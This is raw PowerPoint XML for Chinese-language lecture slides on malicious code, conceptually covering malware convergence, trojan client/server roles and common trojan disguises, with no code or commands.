        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意代码的分类（续）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="灯片编号占位符 2"/>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5C405ADB-89F0-402C-8BB1-901696F71625}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>254</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>病毒、蠕虫、木马之间的界限已经不再明显；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>综合使用多种攻击手段：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>传播：计算机系统的漏洞、电子邮件、文件共享、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>浏览、即时通讯工具等</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>社会工程（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>social engineering )</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333826" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>各种恶意代码融合趋势</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89911C4B-57AF-4D2B-A30E-555BB6C7F7ED}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>255</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </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a:t>也称木马病毒，通过特定的程序（木马程序）来控制另一台计算机。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通常有两个可执行程序：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>控制端：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>被控制端：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>受害者</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>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256</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2080557787"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="2957513"/>
            <a:ext cx="8032750" cy="785812"/>
            <a:chOff x="611188" y="2957513"/>
            <a:chExt cx="8033149" cy="785813"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 2"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="959111" y="295751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1"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2"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59" name="Group 11"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="611188" y="3063875"/>
              <a:ext cx="744168" cy="608013"/>
              <a:chOff x="579" y="1386"/>
              <a:chExt cx="385" cy="383"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3076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63" name="Group 13"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="587" y="1392"/>
                <a:ext cx="369" cy="369"/>
                <a:chOff x="587" y="1392"/>
                <a:chExt cx="369" cy="369"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3076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70" name="Text Box 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="1473243" y="310038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a:latin typeface="+mn-ea"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>某个无害网页，其实隐藏了木马代码</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30761" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="758089" y="310038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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="4144963"/>
            <a:ext cx="8032750" cy="785812"/>
            <a:chOff x="611188" y="4144963"/>
            <a:chExt cx="8033149" cy="785813"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23" name="Group 2"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="959111" y="414496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6"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7"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49" name="Group 11"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="611188" y="4251325"/>
              <a:ext cx="744168" cy="608013"/>
              <a:chOff x="579" y="1386"/>
              <a:chExt cx="385" cy="383"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3075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53" name="Group 13"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="587" y="1392"/>
                <a:ext cx="369" cy="369"/>
                <a:chOff x="587" y="1392"/>
                <a:chExt cx="369" cy="369"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3075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60" name="Text Box 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="1473243" y="428783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a:latin typeface="+mn-ea"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>某个系统程序，被替换成木马程序</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30751" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="758089" y="428783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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="5368925"/>
            <a:ext cx="8032750" cy="785813"/>
            <a:chOff x="611188" y="5368926"/>
            <a:chExt cx="8033149" cy="785813"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27" name="Group 2"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="959111" y="5368926"/>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6"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7"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39" name="Group 11"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="611188" y="5475288"/>
              <a:ext cx="744168" cy="608013"/>
              <a:chOff x="579" y="1386"/>
              <a:chExt cx="385" cy="383"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3074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43" name="Group 13"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="587" y="1392"/>
                <a:ext cx="369" cy="369"/>
                <a:chOff x="587" y="1392"/>
                <a:chExt cx="369" cy="369"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3074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50" name="Text Box 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="1473243" y="5511801"/>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en-US" altLang="zh-CN" sz="2800" b="1">
                  <a:latin typeface="+mn-ea"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Email</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                  <a:latin typeface="+mn-ea"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>中某个图片，其实包含了恶意代码</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30741" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="758089" y="5511801"/>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4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="1733550"/>
            <a:ext cx="8032750" cy="785813"/>
            <a:chOff x="611188" y="1733551"/>
            <a:chExt cx="8033149" cy="785813"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 2"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="959111" y="1733551"/>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5"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8"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29" name="Group 11"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="611188" y="1839913"/>
              <a:ext cx="744168" cy="608013"/>
              <a:chOff x="579" y="1386"/>
              <a:chExt cx="385" cy="383"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3073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33" name="Group 13"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="587" y="1392"/>
                <a:ext cx="369" cy="369"/>
                <a:chOff x="587" y="1392"/>
                <a:chExt cx="369" cy="369"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3073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0730" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="758089" y="1876426"/>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1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Text Box 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="1473243" y="1901826"/>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a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>看起来像一个其它用途的程序</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马的伪装方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>257</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20795421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72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>258</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马示例</a:t>
            </a:r>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1774651"/>
            <a:ext cx="17287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5411788" y="1347614"/>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b="1">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需要一个软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1261889"/>
            <a:ext cx="2452688" cy="2571750"/>
            <a:chOff x="608856" y="836712"/>
            <a:chExt cx="2453680" cy="2552154"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9"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314290"/>
              <a:ext cx="2450976" cy="2074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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="608856" y="836712"/>
              <a:ext cx="2450504" cy="47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t>软件下载</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Freeform 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-994613">
            <a:off x="3017838" y="3174826"/>
            <a:ext cx="2392362" cy="625475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 864"/>
              <a:gd name="T1" fmla="*/ 0 h 394"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 3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394"/>
              <a:gd name="T35" fmla="*/ 864 w 864"/>
              <a:gd name="T36" fmla="*/ 394 h 3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394">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="12"/>
                  <a:pt x="89" y="20"/>
                  <a:pt x="144" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="50"/>
                  <a:pt x="269" y="47"/>
                  <a:pt x="332" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="352" y="78"/>
                  <a:pt x="378" y="80"/>
                  <a:pt x="404" y="93"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="392" y="144"/>
                  <a:pt x="392" y="190"/>
                  <a:pt x="339" y="208"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="330" y="244"/>
                  <a:pt x="317" y="272"/>
                  <a:pt x="360" y="288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="382" y="319"/>
                  <a:pt x="474" y="351"/>
                  <a:pt x="512" y="360"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="540" y="367"/>
                  <a:pt x="598" y="374"/>
                  <a:pt x="598" y="374"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="776" y="366"/>
                  <a:pt x="760" y="394"/>
                  <a:pt x="843" y="288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="845" y="278"/>
                  <a:pt x="846" y="268"/>
                  <a:pt x="850" y="259"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="853" y="253"/>
                  <a:pt x="864" y="244"/>
                  <a:pt x="864" y="244"/>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306211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538" y="4011439"/>
            <a:ext cx="3313112"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4427538" y="3827289"/>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b="1">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>重要数据失窃</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1143156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5E-6 3.7037E-7 L 0.31962 -0.04259 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="15972" y="-213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4"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5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1412875"/>
            <a:ext cx="471963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5" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1763713" y="836613"/>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ea typeface="方正舒体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>这表面上是一个记事本一样的程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="108556"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25" y="3984625"/>
            <a:ext cx="3743325"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7" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5508625" y="2708275"/>
            <a:ext cx="3536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ea typeface="方正舒体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>其实在远端的一台机器上</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:ea typeface="方正舒体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>有一个程序正收集你写的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:ea typeface="方正舒体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>所有文字</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108558" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2771775" y="5013325"/>
            <a:ext cx="1368425" cy="1223963"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108559" name="Freeform 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331913" y="4652963"/>
            <a:ext cx="1344612" cy="1008062"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 257 w 847"/>
              <a:gd name="T1" fmla="*/ 0 h 635"/>
              <a:gd name="T2" fmla="*/ 30 w 847"/>
              <a:gd name="T3" fmla="*/ 363 h 635"/>
              <a:gd name="T4" fmla="*/ 438 w 847"/>
              <a:gd name="T5" fmla="*/ 590 h 635"/>
              <a:gd name="T6" fmla="*/ 847 w 847"/>
              <a:gd name="T7" fmla="*/ 635 h 635"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 847"/>
              <a:gd name="T13" fmla="*/ 0 h 635"/>
              <a:gd name="T14" fmla="*/ 847 w 847"/>
              <a:gd name="T15" fmla="*/ 635 h 635"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
